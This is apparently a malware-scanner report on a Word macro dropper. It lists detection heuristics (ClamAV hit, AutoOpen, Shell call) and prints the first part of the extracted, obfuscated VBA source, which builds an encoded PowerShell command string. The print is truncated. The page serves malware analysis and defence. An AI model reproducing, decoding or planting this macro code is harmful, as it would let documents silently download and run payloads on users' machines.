MALICIOUS
242
Risk Score
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6585023-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6585023-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11281 bytes |
SHA-256: ab082eaf50b2a2b91a0bf6111010f0995aa549ef472dfd0563ac964f01e8eb68 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "OscBYbbNcFiGzm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "IsBZjroFVSaMih"
Function UcFGaqbSz()
On Error Resume Next
EzdKQi = 88270
JsGzd = CDate(60416)
pJiUX = UFlOEJ
zGHof = CDate(IjBlh + Sin(9415 + 5793) * 87619 * CInt(4082))
ABKnhc = CByte(tCMic)
TZLwGq = 60933
lsLXL = "Owe" + "rSHell ('2" + "3H97H112E80H97>" + "94P120~19R14H1" + "9H93>86y"
VUufb = 59564
RGwCz = CDate(73449)
BNmJiz = QHsSp
umKIf = CDate(CIAAo + Sin(5907 + 51964) * 23041 * CInt(77602))
ZZdHTR = CByte(wLrSlB)
VHWTWr = 33435
smhFr = "68~30R92!81H" + "89H86c80H71E1" + "9c65E82E" + "93~87~92R94c"
azjLjK = 50450
AmAMsf = CDate(60888)
jYfkC = jbZzC
XAhAHC = CDate(oVooi + Sin(73920 + 48287) * 35610 * CInt(51871))
diardj = CByte(pKcZvM)
Tzownq = 21412
tWsRh = "8>23x105R92x123" + "E118~67y19y14" + "y19E93P86>6" + "8c30R92P81E89P"
MuwHFN = 53243
zZhDWr = CDate(89993)
XapZLa = bNDrqt
IWCOsQ = CDate(KdOOvQ + Sin(55795 + 94560) * 33447 * CInt(46091))
GiHbTZ = CByte(IGAJV)
cZuQV = 13691
YmisjRD = "86H80R71!19P96" + ">74>64R71" + "E86c94x29" + "~125" + "c86>" + "71x29x100" + ">86R81>112H" + "95!90H86R93y71" + "P8!23E90E9"
QKrMpm = 8474
DfTnU = CDate(70194)
LFKruQ = doLGli
ViqMKG = CDate(Irwaf + Sin(29162 + 88598) * 87078 * CInt(52712))
UcQfoU = CByte(AiLcY)
Rzclu = 50571
FLhmwHsd = "8y89c101" + "!113>19y14P" + "19y2" + "0R91>71H" + "71~67P9R28" + "~28x87" + "R82>93x" + "80P" + "92x87P29c"
UcFGaqbSz = lsLXL + smhFr + tWsRh + YmisjRD + FLhmwHsd
End Function
Function pXAimiOG()
On Error Resume Next
ibbloG = 28692
WvHWNG = CDate(19225)
lOAkAk = rVzmwo
XhDpW = CDate(XDjkiK + Sin(62459 + 59330) * 78815 * CInt(92875))
JWJEsb = CByte(arbNu)
iGLJl = 71979
vwtwYaKU = "80~" + "92P94c28P6" + "8R67" + "~30P80>92~" + "93!71" + "R86"
jBzwF = 41748
tkFrp = CDate(99056)
TmSqOr = RVrHRT
EtApSO = CDate(INptsH + Sin(36862 + 11824) * 63239 * CInt(75153))
CrGLpc = CByte(JkXzbz)
ksWLq = 68029
jSwhWHZlZEN = "~93>71R28y65x11" + "7P103c96R73" + "y28H115H91" + "P71!71" + "P67>9E" + "28y28H" + "80c"
aMKZkM = 60577
BsmBw = CDate(41202)
wcjWl = TwLUUc
IFVHbR = CDate(GXRTfo + Sin(94339 + 52285) * 77302 * CInt(8087))
qhnDSr = CByte(NQNiJ)
NOAXi = 6263
DrJSLLXp = "92" + "y80x92" + "E91H92" + "H70!29!80~"
Bfspjc = 18703
FIlvSs = CDate(36770)
CdTwnP = rzvFiu
XqcYbz = CDate(QjmpU + Sin(52187 + 96587) * 89633 * CInt(30658))
NaEiz = CByte(tMmUln)
AOPpwu = 97971
noYjiIB = "92!94c29>82x70c" + "28y82P70y9" + "2y84>123!97" + "y28" + "!115y" + "91E71P71c67~9" + "P28~28E82y90P" + "85R86x64~" + "87R8" + "6!64R"
WJUdIi = 40076
hiCIm = CDate(72523)
rItRmj = FIbcq
noiIL = CDate(khdoDh + Sin(63570 + 58749) * 47379 * CInt(87535))
DHNVB = CByte(Pzikb)
zivFi = 92289
QnArwSd = "67P86P71H64" + "H29H85E65~28E69" + "y7>1" + "21>5P28!1"
VJsFs = 63403
DCMHq = CDate(61928)
EUFhF = bpGVzv
uNDWu = CDate(ooaci + Sin(643 + 42022) * 74831 * CInt(3607))
uWIkP = CByte(dsnBI)
CiRimK = 51958
qzaUjACPX = "15" + ">91E71H71P" + "67H9E28c" + "28!80R91~65"
nimwzO = 12907
OPYYso = CDate(9039)
RtLNWI = fSEck
qudFL = CDate(DGtGd + Sin(54586 + 23322) * 69891 * CInt(10194))
FBmiB = CByte(InkwMO)
qANMbb = 5956
pSjTBEr = "E9" + "0c64R71H90H9" + "3c86P9" + "5!86R" + "81y86c80" + "y88>2" + "9H80x92c"
VlPkUs = 15775
wnHvTR = CDate(12309)
wZwjjJ = BjTKo
qdOVw = CDate(pEuJq + Sin(34025 + 29439) * 92392 * CInt(61945))
jmZdKp = CByte(wdqvi)
cpQEj = 81674
RGmDIaMtuhd = "94~28x11>5c98x" + "10!28!1" + "15E91>71y" + "71>67~" + "9~28P2" + "8P68>68c68y" + "29P67c82c74!67" + "E95c" + "70P64!29!69x93H" + "28~82~6"
AQZIJi = 67003
ofPAV = CDate(49671)
IhHYsw = fLlzT
bhvDY = CDate(qNiOp + Sin(52024 + 49807) * 92434 * CInt(31353))
FQXCHb = CByte(tSaohW)
IMPRu = 66204
OEzhGljFXw = "4H103E112!127" + "c5~71!2" + "8c20~29" + "!96c67y95R90E" + "71y27y20!115" + ">20~26" + "P8y"
pXAimiOG = vwtwYaKU + jSwhWHZlZEN + DrJSLLX
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.